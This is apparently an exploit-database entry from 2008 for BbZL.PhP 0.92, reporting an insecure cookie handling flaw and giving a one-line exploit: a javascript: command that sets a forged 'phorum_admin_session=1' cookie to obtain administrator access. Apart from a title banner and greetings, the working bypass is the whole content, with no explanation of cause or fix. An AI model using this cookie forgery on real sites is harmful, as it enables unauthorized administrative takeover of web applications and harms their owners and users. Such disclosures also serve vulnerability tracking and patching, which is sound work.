id: 3798
date: 09/27/2008
title: BbZL.PhP 0.92 Insecure Cookie Handling Vulnerability
author: Stack
cves: 

====================================================
BbZL.PhP 0.92 Insecure Cookie Handling Vulnerability
====================================================


###############################################################################################
[+] BbZL.PhP 0.92 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack            
[+] Greetz : All my freind           
################################################################################################
Exploit:
javascript:document.cookie = "phorum_admin_session=1; path=/";



#  0day.today [2023-03-23]  #